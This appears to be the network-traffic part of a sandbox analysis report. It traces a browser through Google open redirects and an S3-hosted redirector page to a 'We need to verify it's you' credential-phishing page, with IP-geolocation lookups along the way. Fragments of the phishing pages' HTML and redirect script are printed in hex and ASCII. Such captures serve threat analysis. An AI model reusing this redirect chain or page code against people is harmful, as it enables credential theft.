                                                          Dec 2, 2024 17:55:18.992985964 CET1.1.1.1192.168.2.40x4bafNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:18.993935108 CET1.1.1.1192.168.2.40xcc56No error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.737317085 CET1.1.1.1192.168.2.40x8723No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.737317085 CET1.1.1.1192.168.2.40x8723No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.737317085 CET1.1.1.1192.168.2.40x8723No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.738018036 CET1.1.1.1192.168.2.40x7f1eNo error (0)api.ipify.org65IN (0x0001)false
                                                          Dec 2, 2024 17:55:24.739015102 CET1.1.1.1192.168.2.40xe7edNo error (0)apnasofa.com103.160.107.138A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.614950895 CET1.1.1.1192.168.2.40xc781No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.614950895 CET1.1.1.1192.168.2.40xc781No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.614950895 CET1.1.1.1192.168.2.40xc781No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.616444111 CET1.1.1.1192.168.2.40x69a8No error (0)api.ipify.org65IN (0x0001)false
                                                          Dec 2, 2024 17:55:26.814457893 CET1.1.1.1192.168.2.40x7fbeNo error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                          Dec 2, 2024 17:55:29.727961063 CET1.1.1.1192.168.2.40x8e65No error (0)ipwhois.app103.126.138.87A (IP address)IN (0x0001)false
                                                          • www.google.sn
                                                          • fs.microsoft.com
                                                          • i--iy.s3.us-east-1.amazonaws.com
                                                          • https:
                                                            • apnasofa.com
                                                            • api.ipify.org
                                                            • ipwhois.app
                                                          • slscr.update.microsoft.com
                                                          • otelrules.azureedge.net
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449736172.217.19.2274437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:11 UTC883OUTGET /url?q=lheard@wc.com&wc.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                          Host: www.google.sn
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:12 UTC1036INHTTP/1.1 302 Found
                                                          Location: https://www.google.sn/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                          Cache-Control: private
                                                          Content-Type: text/html; charset=UTF-8
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ON2QcnrffTVpqbvK7TkahQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                          Permissions-Policy: unload=()
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Date: Mon, 02 Dec 2024 16:55:12 GMT
                                                          Server: gws
                                                          Content-Length: 273
                                                          X-XSS-Protection: 0
                                                          Set-Cookie: NID=519=cT6yRArz5LPOngWUt5-gDsrB6NSNUY1EfMxZpdNoyZ7ircpxiYVNljQhn84VPXFa0haU2BAPEqEgGwGM6GYQ4qBSgvaJFGh_YrCXHyhveczuLydmkMSbblVsEG6B4bqvGtVVT7MszTIXRQfteAIQunFlGlhDMx5pHdI419-mECkLjAGtHBFOJE1GbrLGD3HxR8A00g; expires=Tue, 03-Jun-2025 16:55:12 GMT; path=/; domain=.google.sn; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-02 16:55:12 UTC273INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 73 6e 2f 61 6d 70 2f 73 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.sn/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449745172.217.19.2274437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:14 UTC1063OUTGET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                                                          Host: www.google.sn
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=519=cT6yRArz5LPOngWUt5-gDsrB6NSNUY1EfMxZpdNoyZ7ircpxiYVNljQhn84VPXFa0haU2BAPEqEgGwGM6GYQ4qBSgvaJFGh_YrCXHyhveczuLydmkMSbblVsEG6B4bqvGtVVT7MszTIXRQfteAIQunFlGlhDMx5pHdI419-mECkLjAGtHBFOJE1GbrLGD3HxR8A00g
                                                          2024-12-02 16:55:15 UTC825INHTTP/1.1 302 Found
                                                          Location: https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                                                          Cache-Control: private
                                                          X-Robots-Tag: noindex
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2FMJoYhFU5odv7Y1dzmTWw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                          Permissions-Policy: unload=()
                                                          Date: Mon, 02 Dec 2024 16:55:14 GMT
                                                          Server: gws
                                                          Content-Length: 253
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-12-02 16:55:15 UTC253INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.44974623.32.185.164443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:14 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-12-02 16:55:15 UTC478INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Server: Kestrel
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          X-Ms-ApiVersion: Distribute 1.2
                                                          X-Ms-Region: prod-weu-z1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-OSID: 2
                                                          X-CID: 2
                                                          X-CCC: GB
                                                          Cache-Control: public, max-age=95506
                                                          Date: Mon, 02 Dec 2024 16:55:14 GMT
                                                          Connection: close
                                                          X-CID: 2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.44975023.32.185.164443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:16 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                          Range: bytes=0-2147483646
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-12-02 16:55:17 UTC535INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          ApiVersion: Distribute 1.1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                          Cache-Control: public, max-age=155511
                                                          Date: Mon, 02 Dec 2024 16:55:16 GMT
                                                          Content-Length: 55
                                                          Connection: close
                                                          X-CID: 2
                                                          2024-12-02 16:55:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.44975152.217.199.104437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:17 UTC690OUTGET /vocabulary.html HTTP/1.1
                                                          Host: i--iy.s3.us-east-1.amazonaws.com
                                                          Connection: keep-alive
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:17 UTC413INHTTP/1.1 200 OK
                                                          x-amz-id-2: Vvumulwedxr5rguljCJhqCAooC5Xmbkb9IkhPNCz9JA4W0KtEsFAtq8EtldkCKTYKANlRxiYZ3o=
                                                          x-amz-request-id: Z6R55CD4QET65FHT
                                                          Date: Mon, 02 Dec 2024 16:55:18 GMT
                                                          Last-Modified: Thu, 28 Nov 2024 20:19:57 GMT
                                                          ETag: "495735a2f76daba1413c4e6e2f30911b"
                                                          x-amz-server-side-encryption: AES256
                                                          Accept-Ranges: bytes
                                                          Content-Type: text/html
                                                          Content-Length: 442
                                                          Server: AmazonS3
                                                          Connection: close
                                                          2024-12-02 16:55:17 UTC442INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 65 6e 63 6f 64 65 64 20 65 6d 61 69 6c 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52 4c 20 68 61 73 68 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6d 61 69 6c 45 6e 63 6f 64 65 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 20 2f 2f 20 52 65 6d 6f 76 65 20 74 68 65 20 66 69 72 73 74 20 63 68 61 72 61 63 74 65 72 20 27 23 27 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <script> // Get the encoded email parameter from the URL hash var emailEncoded = window.location.hash.substring(1); // Remove the first character '#' // Redire


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449754103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:20 UTC706OUTGET /episode/index HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Referer: https://i--iy.s3.us-east-1.amazonaws.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:21 UTC1028INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=2592000
                                                          expires: Wed, 01 Jan 2025 16:55:21 GMT
                                                          content-type: text/html
                                                          last-modified: Thu, 28 Nov 2024 09:22:09 GMT
                                                          accept-ranges: bytes
                                                          content-length: 1471
                                                          date: Mon, 02 Dec 2024 16:55:21 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:21 UTC340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 6c 65 61 73 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>pleased</title> <link rel="stylesheet" href="style.css"></head><body> <div class="container"
                                                          2024-12-02 16:55:21 UTC1131INData Raw: 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 2f 6c 6f 67 6f 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 65 20 6e 65 65 64 20 74 6f 20 76 65 72 69 66 79 20 69 74 27 73 20 79 6f 75 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6d 61 69 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                          Data Ascii: tainer"> <img src="image/logo.png" class="logo" alt="Logo"> </div> <div class="header"> We need to verify it's you </div> <div class="email-container"> <div


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449755103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:21 UTC553OUTGET /episode/style.css HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://apnasofa.com/episode/index
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:22 UTC1027INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=2592000
                                                          expires: Wed, 01 Jan 2025 16:55:22 GMT
                                                          content-type: text/css
                                                          last-modified: Thu, 28 Nov 2024 13:58:47 GMT
                                                          accept-ranges: bytes
                                                          content-length: 3703
                                                          date: Mon, 02 Dec 2024 16:55:22 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:22 UTC341INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 41 46 41 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 20 20 20
                                                          Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { background-color: #FFFAFA; font-family: 'Segoe UI', Arial, sans-serif; line-height: 1.6; color: #333;}.container { max-width: 800px; margin: 40px auto;
                                                          2024-12-02 16:55:22 UTC3362INData Raw: 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 7d 0a 0a 2f 2a 20 4c 6f 67 6f 20 53 74 79 6c 65 73 20 2a 2f 0a 2e 6c 6f 67 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 36 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20
                                                          Data Ascii: px rgba(0, 0, 0, 0.1);}/* Logo Styles */.logo-container { text-align: center; margin-bottom: 20px; padding: 10px;}.logo { max-width: 160px; height: auto; margin: 0 auto;}.verification-section { text-align: center;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.4497564.175.87.197443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:22 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2nvR5RnwFWOGpbB&MD=eSUd7a8V HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-12-02 16:55:23 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                          MS-CorrelationId: 6e026c3a-5b0c-41d1-a7ed-024c7ff25be7
                                                          MS-RequestId: 4d3d8318-7e6b-4f69-b962-befad10df4f1
                                                          MS-CV: a1K/K+0heUSh3ce2.0
                                                          X-Microsoft-SLSClientCache: 2880
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Mon, 02 Dec 2024 16:55:22 GMT
                                                          Connection: close
                                                          Content-Length: 24490
